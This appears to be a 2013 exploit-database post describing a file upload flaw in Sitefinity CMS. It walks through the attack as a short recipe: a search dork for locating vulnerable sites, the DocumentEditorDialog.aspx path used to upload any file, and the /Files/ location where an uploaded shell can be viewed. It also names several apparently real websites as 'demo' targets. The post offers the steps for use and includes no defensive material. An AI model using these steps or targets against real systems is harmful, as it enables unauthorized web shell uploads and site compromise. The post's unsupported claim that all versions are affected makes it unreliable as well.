facebook facebook twitter rss

Sitefinity File Upload Vunarebility

Author: Mr.JerK74 , Published: 23-12-2013
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+]Sitefinity CMS (ASP.NET) File Upload Vulnerability
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


###################################################
#
# Exploit Title: Sitefinity CMS (ASP.NET) File Upload Vulnerability
# Date: 15/10/2013
# Author: Mr.JerK74
# Software Link: www.sitefinity.com
# Version: ALL VERSION
# Category:Web apllication
# Tested on: window xp
# Dork : "Sitefinity: Login"
# Demo site:http://orangecityfire.com/
# http://www.cinhs.com/
# http://www.ppmsales.net/
# facebook.com/sec.gov
#
####################################################

exploit # /UserControls/Dialogs/documentEditorDialog.aspx

first go to # http://site.com/sitefinity/

then # http://site.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx


select # any file (file.php,ASP,ASPX,HTML,TXT)

Upload to # http://site.com/Files/[You-file]

######################################
Exexple :

site : http://orangecityfire.com/

then go to >> http://orangecityfire.com/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

then upload your File

view shell :

http://www.phantompromotionsllc.com/Files/[you-file]

######################################

THANK TO :
[+] Mr.Al-Kaus4r [+] Ghack [+] Zombie-Root [+] Mr.JerK74 [+] Bayu_Santoso [+] Cgt_Evan [+] Sultan Haikal [+] MrTieDie [+] Jje incovers [+] And ALL MY FRIEND :D [+]

Like us on Facebook :